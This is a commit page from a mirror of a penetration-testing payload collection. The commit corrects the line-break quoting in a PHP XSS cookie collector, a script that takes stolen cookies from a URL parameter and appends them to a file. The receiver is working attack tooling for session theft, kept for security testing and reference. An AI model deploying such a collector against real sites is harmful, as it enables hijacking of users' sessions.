1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-06-01 18:06:04 +02:00

Fix PHP XSS data collector line breaks

This commit is contained in:
Max Rodrigo 2020-09-05 10:36:58 +02:00
parent 83fbdb906b
commit 2f40961990

View File

@ -82,7 +82,7 @@ Write the collected data into a file.
<?php
$cookie = $_GET['c'];
$fp = fopen('cookies.txt', 'a+');
fwrite($fp, 'Cookie:' .$cookie.'\r\n');
fwrite($fp, 'Cookie:' .$cookie."\r\n");
fclose($fp);
?>
```